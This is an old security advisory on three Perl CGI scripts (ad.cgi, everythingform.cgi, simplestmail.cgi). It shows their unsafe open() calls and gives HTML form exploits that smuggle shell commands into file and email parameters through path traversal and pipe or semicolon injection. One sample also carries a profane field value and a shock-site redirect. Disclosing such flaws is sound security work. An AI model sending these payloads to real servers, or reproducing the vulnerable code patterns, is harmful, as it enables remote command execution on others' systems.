COMMAND

    Tammie's HUSBAND scripts

SYSTEMS AFFECTED

    Tammie's HUSBAND scripts

PROBLEM

    'rpc'  found  number  of  bugs  in  "Scripts by Tammie's HUSBAND".
    ad.cgi from  "Scripts by  Tammie's HUSBAND"  contains an  insecure
    input  validation   vulnerability.   Information   on  ad.cgi   is
    available at:

        http://www.conservatives.net/atheist/scripts/index.html?ads

    Code snippet:

        $filename = "$FORM{'file'}";
        $datafile = "$basedir" . "$filename";
        ...
        open (INFO, "$datafile");

    Exploit:

    <html>
    <form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
    <h1>ad.cgi exploit</h1>
    Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
    <input type=submit value=run>
    </form>
    </html>

    everythingform.cgi  uses  a  hidden  field  'config'  to determine
    where to read configuration data from.

    Code snippit:

        ..
        $ConfigFile = $in{config};
        ..
         open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in the ReadConfig subroutine. Reason: $!");

    Information regarding everythingform can be found at:

        http://www.conservatives.net/atheist/scripts/index.html?everythingform

    Sample exploit:

    <form action="http://www.conservatives.net/someplace/everythingform.cgi" method=POST>
    <h1>everythingform.cgi exploit</h1>
    Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5 www.foobar.com|">
    <input type=hidden name=Name value="fuck the religious right">
    <input type=hidden name="e-mail" value="foo@bar.net">
    <input type=hidden name=FavoriteColor value=Black>
    <input type=submit value=run>
    </form>

    simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND"
    Leif Wright.  It's available from:

        http://www.conservatives.net/atheist/scripts/index.html?simplestmail

    The code is self explanatory:

        $youremail = $contents_by_name{'MyEmail'};
        open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";

    Exploitation is straight forward:

    <html>
    <form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
    Command: <input type=text name=MyEmail value=";">
    <input type=hidden name=redirect value="http://goatse.cx">
    <input type=submit name=submit value="run">
    </form>
    </html>

SOLUTION

    Nothing yet.